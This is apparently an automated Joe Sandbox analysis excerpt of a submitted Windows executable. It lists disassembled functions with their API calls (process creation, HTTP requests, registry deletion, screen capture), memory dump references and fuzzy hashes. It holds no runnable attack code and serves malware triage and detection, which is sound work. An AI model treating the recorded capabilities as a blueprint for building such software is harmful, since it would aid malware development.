                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 176396367-1603158881
                                                                    • Opcode ID: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
                                                                    • Instruction ID: 22e996ddf934af75e2f4891e1597d999a71b33ea2fd5e63b9a33bc259995b6b9
                                                                    • Opcode Fuzzy Hash: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
                                                                    • Instruction Fuzzy Hash: 75E1F532A00516ABCB289F78C451FEDBBB8FF45710F54C129E566E7290DB70AE8587A0
                                                                    Function 009544C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(00000000,00000000,0097CC08), ref: 00954527
                                                                    • _wcslen.LIBCMT ref: 0095453B
                                                                    • _wcslen.LIBCMT ref: 00954599
                                                                    • _wcslen.LIBCMT ref: 009545F4
                                                                    • _wcslen.LIBCMT ref: 0095463F
                                                                    • _wcslen.LIBCMT ref: 009546A7
                                                                      • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                    • GetDriveTypeW.KERNEL32(?,009A6BF0,00000061), ref: 00954743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2055661098-1000479233
                                                                    • Opcode ID: 176dcccbf62e3e1cdeea337e3935e79467a4414c5c975b51db17c7e58b2bebb1
                                                                    • Instruction ID: 26c53baa0af21e40001631192da74509bb44a69a8bfde2b899d56d865e7bdf82
                                                                    • Opcode Fuzzy Hash: 176dcccbf62e3e1cdeea337e3935e79467a4414c5c975b51db17c7e58b2bebb1
                                                                    • Instruction Fuzzy Hash: D5B138316083029FC750DF2AC890A6AB7E8FF96759F50491DF996C7291E730DC89CB92
                                                                    Function 0096AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0096B198
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1B0
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096B1D4
                                                                    • _wcslen.LIBCMT ref: 0096B200
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B214
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096B236
                                                                    • _wcslen.LIBCMT ref: 0096B332
                                                                      • Part of subcall function 009505A7: GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                    • _wcslen.LIBCMT ref: 0096B34B
                                                                    • _wcslen.LIBCMT ref: 0096B366
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096B3B6
                                                                    • GetLastError.KERNEL32(00000000), ref: 0096B407
                                                                    • CloseHandle.KERNEL32(?), ref: 0096B439
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B44A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B45C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096B46E
                                                                    • CloseHandle.KERNEL32(?), ref: 0096B4E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 2178637699-0
                                                                    • Opcode ID: 418f7d75e96cb3f84411771a51c928a1f449c0974db82d757bf866bfe80a7de7
                                                                    • Instruction ID: c1dd8dc48dca4213bd08d5eb01406b61a58214a16dc8d8ad9d2c7eeb2395b445
                                                                    • Opcode Fuzzy Hash: 418f7d75e96cb3f84411771a51c928a1f449c0974db82d757bf866bfe80a7de7
                                                                    • Instruction Fuzzy Hash: 54F18E716083409FC714EF29C891B2ABBE5FF85714F14855DF9998B2A2DB31DC84CB52
                                                                    Function 008E326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemCount.USER32(009B1990), ref: 00922F8D
                                                                    • GetMenuItemCount.USER32(009B1990), ref: 0092303D
                                                                    • GetCursorPos.USER32(?), ref: 00923081
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0092308A
                                                                    • TrackPopupMenuEx.USER32(009B1990,00000000,?,00000000,00000000,00000000), ref: 0092309D
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009230A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 36266755-4108050209
                                                                    • Opcode ID: ab0b6c46cf41f0457aab5f6776e6cf6f351bebc6ccf430e1bd4cb0624c9f3486
                                                                    • Instruction ID: a4228584f9b47cf262377b6cb2130d09c9e9acd5e58a3034a3a80341c992ae76
                                                                    • Opcode Fuzzy Hash: ab0b6c46cf41f0457aab5f6776e6cf6f351bebc6ccf430e1bd4cb0624c9f3486
                                                                    • Instruction Fuzzy Hash: 8E714B71644215BEEB258F25DD89FAABF78FF01324F204206F618AB1E0C7B1AD50DB50
                                                                    Function 00976CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 00976DEB
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00976E5F
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00976E81
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976E94
                                                                    • DestroyWindow.USER32(?), ref: 00976EB5
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 00976EE4
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00976EFD
                                                                    • GetDesktopWindow.USER32 ref: 00976F16
                                                                    • GetWindowRect.USER32(00000000), ref: 00976F1D
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00976F35
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00976F4D
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 2429346358-3619404913
                                                                    • Opcode ID: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
                                                                    • Instruction ID: aa9af0f17ab9ad994b1b4a5bfa2617feffd31e0b601a8d2eede28653ed9b4aa7
                                                                    • Opcode Fuzzy Hash: 881a5507634c9c7e4e9f13044825debc907b8069939d32962bfabd576c858c90
                                                                    • Instruction Fuzzy Hash: 2F719872108241AFDB21DF28DC58FBABBF9FB89304F54491DF98987261C770A949DB12
                                                                    Function 0097911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00979147
                                                                      • Part of subcall function 00977674: ClientToScreen.USER32(?,?), ref: 0097769A
                                                                      • Part of subcall function 00977674: GetWindowRect.USER32(?,?), ref: 00977710
                                                                      • Part of subcall function 00977674: PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009791B0
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009791BB
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009791DE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00979225
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0097923E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00979255
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00979277
                                                                    • DragFinish.SHELL32(?), ref: 0097927E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00979371
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 221274066-3440237614
                                                                    • Opcode ID: db34b12b1cfdf2938c2b2a8edb836221a7d4996133e665ca5f33017c535f1ee9
                                                                    • Instruction ID: 164424bc6c56d67bc44ed3bc987c83d7326fe63b13c16e1a7229142288485ffb
                                                                    • Opcode Fuzzy Hash: db34b12b1cfdf2938c2b2a8edb836221a7d4996133e665ca5f33017c535f1ee9
                                                                    • Instruction Fuzzy Hash: 31616772108341AFC701EF65DC85DAFBBE8FB89750F40092EF5A5921A1DB709A49CB92
                                                                    Function 0095C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C4B0
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C4C3
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C4D7
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0095C4F0
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0095C533
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0095C549
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C554
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C584
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0095C5DC
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0095C5F0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0095C5FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                    • String ID:
                                                                    • API String ID: 3800310941-3916222277
                                                                    • Opcode ID: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
                                                                    • Instruction ID: 7668a32dc1b8551235d73459f09717a4b6dd8ab2bcc04911e9db3adca0b70243
                                                                    • Opcode Fuzzy Hash: f5a7d149d1954c0613666d99f44cd73ae2fabff037be8b3c293921af234f0a79
                                                                    • Instruction Fuzzy Hash: E7514EF1504305BFDB21CFA6C988AAB7BBCFF04755F00441DF94996250EB34EA49AB60
                                                                    Function 0097856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00978592
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 009785A2
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 009785AD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009785BA
                                                                    • GlobalLock.KERNEL32(00000000), ref: 009785C8
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009785D7
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 009785E0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 009785E7
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009785F8
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,?), ref: 00978611
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00978621
                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00978641
                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00978671
                                                                    • DeleteObject.GDI32(00000000), ref: 00978699
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009786AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
                                                                    • Instruction ID: 095435c52bee59a0c49331333d9c2b7a8e4b5584771e5023529c82313f390eac
                                                                    • Opcode Fuzzy Hash: ab53067a0da2a6176adf8170022cfd5fc2b7841b4e53842fe4a3225d3e9f7760
                                                                    • Instruction Fuzzy Hash: B54118B6644205BFDB119FA5CC8CEAB7BBCEF89B15F108058F919E7260DB309941DB60
                                                                    Function 009514BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 00951502
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0095150B
                                                                    • VariantClear.OLEAUT32(?), ref: 00951517
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009515FB
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00951657
                                                                    • VariantInit.OLEAUT32(?), ref: 00951708
                                                                    • SysFreeString.OLEAUT32(?), ref: 0095178C
                                                                    • VariantClear.OLEAUT32(?), ref: 009517D8
                                                                    • VariantClear.OLEAUT32(?), ref: 009517E7
                                                                    • VariantInit.OLEAUT32(00000000), ref: 00951823
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 1234038744-3931177956
                                                                    • Opcode ID: 1c2e76688c29389a59fe8272206e19b484f5ca5cc40a1534847f6a4c01277b20
                                                                    • Instruction ID: b152dc8c1091713c57926e449b77d4a2dd89149fd8e40cd967d8a78a79f56c55
                                                                    • Opcode Fuzzy Hash: 1c2e76688c29389a59fe8272206e19b484f5ca5cc40a1534847f6a4c01277b20
                                                                    • Instruction Fuzzy Hash: A6D10172A00105DBCB00EF6AD885B7DB7B9FF45701F10845AF946AB191EB38DC4ADB62
                                                                    Function 0096B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096B6F4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096B772
                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0096B80A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096B87E
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096B89C
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0096B8F2
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096B904
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0096B922
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0096B983
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096B994
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 146587525-4033151799
                                                                    • Opcode ID: b665d699f458925101652774964d7a4599a6c04fbe2e1327c6a6ca90d102159c
                                                                    • Instruction ID: c2b46c21e2ffdfd8621b3e5293ba174f24ac51e878cad8e046fccbb1aa00a534
                                                                    • Opcode Fuzzy Hash: b665d699f458925101652774964d7a4599a6c04fbe2e1327c6a6ca90d102159c
                                                                    • Instruction Fuzzy Hash: 24C19D31208241AFD714DF18C495F2ABBE5FF85308F14845CF4AA8B2A2DB75ED85CB92
                                                                    Function 0096255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 009625D8
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009625E8
                                                                    • CreateCompatibleDC.GDI32(?), ref: 009625F4
                                                                    • SelectObject.GDI32(00000000,?), ref: 00962601
                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0096266D
                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009626AC
                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009626D0
                                                                    • SelectObject.GDI32(?,?), ref: 009626D8
                                                                    • DeleteObject.GDI32(?), ref: 009626E1
                                                                    • DeleteDC.GDI32(?), ref: 009626E8
                                                                    • ReleaseDC.USER32(00000000,?), ref: 009626F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 01fc3299d5846f8a7b2492b9e10af916cf2c63fe0ea6b0b3d386e702513f1e00
                                                                    • Instruction ID: 3fc30eaa3319263ee663a4941c1dd2d8a2712dfdd6eeb3657ae414fd859fbbe3
                                                                    • Opcode Fuzzy Hash: 01fc3299d5846f8a7b2492b9e10af916cf2c63fe0ea6b0b3d386e702513f1e00
                                                                    • Instruction Fuzzy Hash: 5761E5B6D04219EFCF14CFA4D884EAEBBB5FF48310F20852AE559A7250D774A941DF50
                                                                    Function 0091DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 0091DAA1
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D659
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D66B
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D67D
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D68F
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6A1
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6B3
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6C5
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6D7
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6E9
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D6FB
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D70D
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D71F
                                                                      • Part of subcall function 0091D63C: _free.LIBCMT ref: 0091D731
                                                                    • _free.LIBCMT ref: 0091DA96
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 0091DAB8
                                                                    • _free.LIBCMT ref: 0091DACD
                                                                    • _free.LIBCMT ref: 0091DAD8
                                                                    • _free.LIBCMT ref: 0091DAFA
                                                                    • _free.LIBCMT ref: 0091DB0D
                                                                    • _free.LIBCMT ref: 0091DB1B
                                                                    • _free.LIBCMT ref: 0091DB26
